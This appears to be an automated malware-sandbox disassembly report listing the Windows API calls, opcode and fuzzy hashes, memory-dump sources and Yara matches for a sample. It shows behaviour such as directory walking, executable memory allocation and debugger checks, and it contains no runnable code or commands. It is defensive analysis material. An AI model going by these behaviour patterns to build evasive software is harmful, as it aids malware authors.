                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: String
                                          • String ID:
                                          • API String ID: 2568140703-0
                                          • Opcode ID: f1bc6162362988bcaf7b2c1e2206d432c0fb3cb4b2faf3a1b3bbdcbb9e9cadb5
                                          • Instruction ID: 40915b07663caab3b1fae5a2d68e270af20627baf782b3e7fe1e048ecad31851
                                          • Opcode Fuzzy Hash: f1bc6162362988bcaf7b2c1e2206d432c0fb3cb4b2faf3a1b3bbdcbb9e9cadb5
                                          • Instruction Fuzzy Hash: 32F0683200055AFBCF236F90DC09DDE3E2AFB48760F058416FA182A120C63AD831AB94
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000000,038F518A), ref: 038F353D
                                          • RtlFreeHeap.NTDLL(00000000), ref: 038F3544
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$FreeProcess
                                          • String ID:
                                          • API String ID: 3859560861-0
                                          • Opcode ID: 859f970d10bbb1f9e9dd3a19ffe2186af6e26e60d859a26f5b4fa8ec5e4298bd
                                          • Instruction ID: 14e22cbd2c66dda3fb1f2504602a8256aa325411a6dda6d1b9826cb6bd474bf8
                                          • Opcode Fuzzy Hash: 859f970d10bbb1f9e9dd3a19ffe2186af6e26e60d859a26f5b4fa8ec5e4298bd
                                          • Instruction Fuzzy Hash: AFB092745015006FFE486BE0991DF3A3618FF84743F1400C8F202D104486A880108620
                                          APIs
                                          • GetCPInfo.KERNEL32(FFFFF9B2,?,00000005,007E2DA5,?), ref: 007E2B9B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: Info
                                          • String ID:
                                          • API String ID: 1807457897-0
                                          • Opcode ID: e8949f8726e5da0eecaa822ca6b6b92085a76226aa64e04332607ab04a0fd7c1
                                          • Instruction ID: d02df1cf2ba96dea740d1dd3ea53bce570e31d0f0e900a4c23acdf13520f1a12
                                          • Opcode Fuzzy Hash: e8949f8726e5da0eecaa822ca6b6b92085a76226aa64e04332607ab04a0fd7c1
                                          • Instruction Fuzzy Hash: D4518AB0909198AADB118F29CC84BF9BB7CFB19304F2401E9E189C7153D339AD86DB70
                                          APIs
                                          • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 007D037B
                                            • Part of subcall function 007D106C: RaiseException.KERNEL32(E06D7363,00000001,00000003,007D038E,?,?,?,?,007D038E,?,007F8484), ref: 007D10CC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ExceptionRaisestdext::threads::lock_error::lock_error
                                          • String ID:
                                          • API String ID: 3447279179-0
                                          • Opcode ID: 8384a2509de4622fc921ad8ed7772f6444f8ea7cbf2dbdd1d141a5043fde302d
                                          • Instruction ID: d7ce49c0c845047d12c35c35cb8ef742e97244a98eac0e34fa0de6f867e83494
                                          • Opcode Fuzzy Hash: 8384a2509de4622fc921ad8ed7772f6444f8ea7cbf2dbdd1d141a5043fde302d
                                          • Instruction Fuzzy Hash: ACF090B480060DF7CB04BAB4EC1EEAD373D9900350F50812AF968961A2EB38EA488195
                                          APIs
                                          • Concurrency::cancel_current_task.LIBCPMTD ref: 00771477
                                            • Part of subcall function 00783D80: stdext::threads::lock_error::lock_error.LIBCPMTD ref: 00783D89
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: Concurrency::cancel_current_taskstdext::threads::lock_error::lock_error
                                          • String ID:
                                          • API String ID: 2103942186-0
                                          • Opcode ID: 7e938961fb2e67025cdff9c0a0f1d748bbed45857ce640becdc6d9bdc5e37106
                                          • Instruction ID: 164e139cc3b30f6d7862417887f2dc2e128662e5575c3d00aa7f753da1bf20b6
                                          • Opcode Fuzzy Hash: 7e938961fb2e67025cdff9c0a0f1d748bbed45857ce640becdc6d9bdc5e37106
                                          • Instruction Fuzzy Hash: 2FF01974E01148EBCF14EFACD485AADB7B1AF44344F50C1A9E80997345E638AF508B81
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000000,?,?,007CFB1F,00000000,?,0078322C,00000000,?,007713A5,00000000), ref: 007DAC47
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 37c6a7564f3007180ea2d20c8bcf6f2e751dd62f5dae23e52854370b5396ec12
                                          • Instruction ID: 91510c59bc4114c6ad67a371463e1281669f2c05e02b200c79e6229499258f72
                                          • Opcode Fuzzy Hash: 37c6a7564f3007180ea2d20c8bcf6f2e751dd62f5dae23e52854370b5396ec12
                                          • Instruction Fuzzy Hash: 07E0E521524A15B7DB3127259C047AA3BB8BB423B0F184163BD0C963D0DB6CCC0082B6
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,00000007,?,?), ref: 00784B9E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 6061fd8eea1d719377fcf9b0fbf558367b55350db4711521b37e099575ea4def
                                          • Instruction ID: a49845cf35b8ac5086a3c4d1caaafba739a4370250a43b79f1f95e0bad53f14d
                                          • Opcode Fuzzy Hash: 6061fd8eea1d719377fcf9b0fbf558367b55350db4711521b37e099575ea4def
                                          • Instruction Fuzzy Hash: 9DD012F6A55109C7CB209B68EC483B27B78F704316B145199EA5847202EF7A45158F44
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: allocator
                                          • String ID:
                                          • API String ID: 3447690668-0
                                          • Opcode ID: 571f10d42482652b194d7ecda06d937b3b08c569b6719ab49de57ad63638ba45
                                          • Instruction ID: f2b8a1dc4d5ec09757dc4e46f032116986bcdf9f12507df698abde4ff19ccee2
                                          • Opcode Fuzzy Hash: 571f10d42482652b194d7ecda06d937b3b08c569b6719ab49de57ad63638ba45
                                          • Instruction Fuzzy Hash: 41C09B7015410C9B8704EF88E491D55779D9B887107004155BC0D4B351DA70FD40C654
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(038F5051,038F447E,?,?,?,?,?,?,?,?,?,?,?,?,?,038F3ECC), ref: 038F407E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: a8afc92646b5656e4bcf3863a2296cda612acbef95964597b5bac4e55f55bb89
                                          • Instruction ID: 99557c7f3b7f28a1d3a6c8f0f1987ac91084018e1562be5fafb5dfd894dfc8d4
                                          • Opcode Fuzzy Hash: a8afc92646b5656e4bcf3863a2296cda612acbef95964597b5bac4e55f55bb89
                                          • Instruction Fuzzy Hash: 42A02238030A008FCA2C23300F2A80E30008E8A3F03220BCCF033C80C0FA28C2800000
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000040), ref: 00788B81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: d08317e1e5fabe19db3e649bd06056583305878db7c631b6c08e147d6820267c
                                          • Instruction ID: ba949bd53a85069fe17f5ab8653c5c3bf59bd47fc80f6a9f9b1d60294a9b5261
                                          • Opcode Fuzzy Hash: d08317e1e5fabe19db3e649bd06056583305878db7c631b6c08e147d6820267c
                                          • Instruction Fuzzy Hash: A42114B1C05A68CBDBA2DF24CD857ADB7B5AF86340F5092C6D40D6A202DB389BC1CF11
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(?,2000000B,jW~,00000002,00000000,?,?,?,007E576A,?,00000000), ref: 007E54F1
                                          • GetLocaleInfoW.KERNEL32(?,20001004,jW~,00000002,00000000,?,?,?,007E576A,?,00000000), ref: 007E551A
                                          • GetACP.KERNEL32(?,?,007E576A,?,00000000), ref: 007E552F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP$jW~
                                          • API String ID: 2299586839-761902356
                                          • Opcode ID: cc1e72f8b811b6cabf996003f939cd94571c51b55aede2483e36864cedd3d1b7
                                          • Instruction ID: 4ff34a1851dc1fa0d6b2c3f48e62089700c9d25d6900dc1bd79fe6cfd90509b6
                                          • Opcode Fuzzy Hash: cc1e72f8b811b6cabf996003f939cd94571c51b55aede2483e36864cedd3d1b7
                                          • Instruction Fuzzy Hash: 0A2108326025C9E6D7308F57D905B9773B7AB5CB2DB668424E909CB144F73ADE40C350
                                          APIs
                                            • Part of subcall function 038F407D: GetFileAttributesW.KERNELBASE(038F5051,038F447E,?,?,?,?,?,?,?,?,?,?,?,?,?,038F3ECC), ref: 038F407E
                                            • Part of subcall function 038F3508: EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
                                            • Part of subcall function 038F3508: GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
                                            • Part of subcall function 038F3508: RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
                                            • Part of subcall function 038F3508: LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B
                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 038F3F5D
                                          • FindNextFileW.KERNEL32(038F1710,?), ref: 038F3FFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CriticalFindHeapSection$AllocateAttributesEnterFirstLeaveNextProcess
                                          • String ID: %s%s$%s\%s$%s\*
                                          • API String ID: 674214967-2064654797
                                          • Opcode ID: 7b1fdf839e5d279df7798f349e3379b5504bb7aa9e542aec2a8d328b052037e8
                                          • Instruction ID: 4ee7376b7c6f01b89ed2095806298d5f68f86ee9795c7ec3cf453c881b005367
                                          • Opcode Fuzzy Hash: 7b1fdf839e5d279df7798f349e3379b5504bb7aa9e542aec2a8d328b052037e8
                                          • Instruction Fuzzy Hash: E531F779A003196FDB21EAE98C44ABEB765DFC0250F0801E5EE05DB290DB758F45CB52
                                          APIs
                                            • Part of subcall function 007DA8F0: GetLastError.KERNEL32(?,?,007D71B7,?,?,?,?,00000003,007D4382,?,007D42F1,?,00000000,007D4500), ref: 007DA8F4
                                            • Part of subcall function 007DA8F0: SetLastError.KERNEL32(00000000,00000000,007D4500,?,?,?,?,?,00000000,?,?,007D459E,00000000,00000000,00000000,00000000), ref: 007DA996
                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 007E573C
                                          • IsValidCodePage.KERNEL32(00000000), ref: 007E577A
                                          • IsValidLocale.KERNEL32(?,00000001), ref: 007E578D
                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 007E57D5
                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 007E57F0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                          • String ID:
                                          • API String ID: 415426439-0
                                          • Opcode ID: ac2b8a6fdc16c7525d2148ae1884da4cf01fb9ea7beea5d953d466ba2cdb9548
                                          • Instruction ID: 6ea593f107ac4d69b33f4ca6b1cbecefacc11bfc4c224af242cc24f537a3fa3f
                                          • Opcode Fuzzy Hash: ac2b8a6fdc16c7525d2148ae1884da4cf01fb9ea7beea5d953d466ba2cdb9548
                                          • Instruction Fuzzy Hash: 8F518271A0268DEBDB20DFA6CC45BAE77B8BF0C704F544429E910EB191EB78D940CB61
                                          APIs
                                            • Part of subcall function 007DA8F0: GetLastError.KERNEL32(?,?,007D71B7,?,?,?,?,00000003,007D4382,?,007D42F1,?,00000000,007D4500), ref: 007DA8F4
                                            • Part of subcall function 007DA8F0: SetLastError.KERNEL32(00000000,00000000,007D4500,?,?,?,?,?,00000000,?,?,007D459E,00000000,00000000,00000000,00000000), ref: 007DA996
                                          • GetACP.KERNEL32(?,?,?,?,?,?,007D89B1,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 007E4D7E
                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,007D89B1,?,?,?,00000055,?,-00000050,?,?), ref: 007E4DB5
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 007E4F18
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CodeInfoLocalePageValid
                                          • String ID: utf8
                                          • API String ID: 607553120-905460609
                                          • Opcode ID: df731c5f1a0de6bb4b1bd518e3b195c2a483da851788f47e89adb0d167cb25b5
                                          • Instruction ID: e75ee3abd6742a2807606661431848403c63d7c73eca9220b5bfc1331db187ed
                                          • Opcode Fuzzy Hash: df731c5f1a0de6bb4b1bd518e3b195c2a483da851788f47e89adb0d167cb25b5
                                          • Instruction Fuzzy Hash: F7711971A02286EADB35EB76DC46BB773A8FF4C700F14402AFA05DB181EA7CED408655
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 038F410D
                                          • FindNextFileW.KERNEL32(000000FF,?), ref: 038F4159
                                            • Part of subcall function 038F3536: GetProcessHeap.KERNEL32(00000000,00000000,038F518A), ref: 038F353D
                                            • Part of subcall function 038F3536: RtlFreeHeap.NTDLL(00000000), ref: 038F3544
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileFindHeap$FirstFreeNextProcess
                                          • String ID: %s\%s$%s\*
                                          • API String ID: 1689202581-2848263008
                                          • Opcode ID: 6c7f4a23d1e343e8b7ce24adef7ab114a0bea6cb38d0b76245f1303778319e5d
                                          • Instruction ID: a82bc65aefb81ffa9434633407210ad0dfbf5dd264bd9e0c482798dbc036d364
                                          • Opcode Fuzzy Hash: 6c7f4a23d1e343e8b7ce24adef7ab114a0bea6cb38d0b76245f1303778319e5d
                                          • Instruction Fuzzy Hash: EC3196787003189FDB20FEEACC8466F7BA99F94240F1440E9DB05CB345EB748A45CB91
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 007D04A1
                                          • IsDebuggerPresent.KERNEL32 ref: 007D056D
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 007D0586
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 007D0590
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                          • String ID:
                                          • API String ID: 254469556-0
                                          • Opcode ID: 0a8d4c52c89d7b4953a564c1b67fbfd43da1c357d7e64e3b78fe39ec5b2e29ea
                                          • Instruction ID: d5488ec3791ef2cbc490dea4c9c82447336888e656aa512b1be1334d0133ddf9
                                          • Opcode Fuzzy Hash: 0a8d4c52c89d7b4953a564c1b67fbfd43da1c357d7e64e3b78fe39ec5b2e29ea
                                          • Instruction Fuzzy Hash: 1131FB75D01219DBDF20EF64D989BCDBBB8AF08304F10419AE50DAB350E7749A84CF85
                                          APIs
                                            • Part of subcall function 007DA8F0: GetLastError.KERNEL32(?,?,007D71B7,?,?,?,?,00000003,007D4382,?,007D42F1,?,00000000,007D4500), ref: 007DA8F4
                                            • Part of subcall function 007DA8F0: SetLastError.KERNEL32(00000000,00000000,007D4500,?,?,?,?,?,00000000,?,?,007D459E,00000000,00000000,00000000,00000000), ref: 007DA996
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007E5130
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007E517A
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007E5240
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: InfoLocale$ErrorLast
                                          • String ID:
                                          • API String ID: 661929714-0
                                          • Opcode ID: 51bce62c7428dbdddbc06d68bcf3e8c77dcd6b02617e449978fc75a7186c96f1
                                          • Instruction ID: 832c92fd16e2593c17b73989fa95392a1f0c0e38d936c48584c2d19d7a8650a3
                                          • Opcode Fuzzy Hash: 51bce62c7428dbdddbc06d68bcf3e8c77dcd6b02617e449978fc75a7186c96f1
                                          • Instruction Fuzzy Hash: B661B3B191264BDFDB289F26CD86B6A77A9FF08308F104079EA05C6185F77CD951CB50
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 007D447B
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 007D4485
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 007D4492
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 5b0f78c2e13555c04cd80bf53e86e55c20b64dac844379f8bf2a80cbd86d1164
                                          • Instruction ID: b3f36d968593a2c0d6dc8c184e4d3a66911ea1dd963cad3f9acb9ab0fa86270e
                                          • Opcode Fuzzy Hash: 5b0f78c2e13555c04cd80bf53e86e55c20b64dac844379f8bf2a80cbd86d1164
                                          • Instruction Fuzzy Hash: 0831C475901218EBCB21DF64D98979DBBB8BF08310F5041DAE50CA6250E7749B858F44
                                          APIs
                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007DD510,?,?,00000008,?,?,007E7A3B,00000000), ref: 007DD742
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise
                                          • String ID:
                                          • API String ID: 3997070919-0
                                          • Opcode ID: 39ae5f170c611ac7e16690354fbd74b063b05dc7afffe292bab36b645283d42c
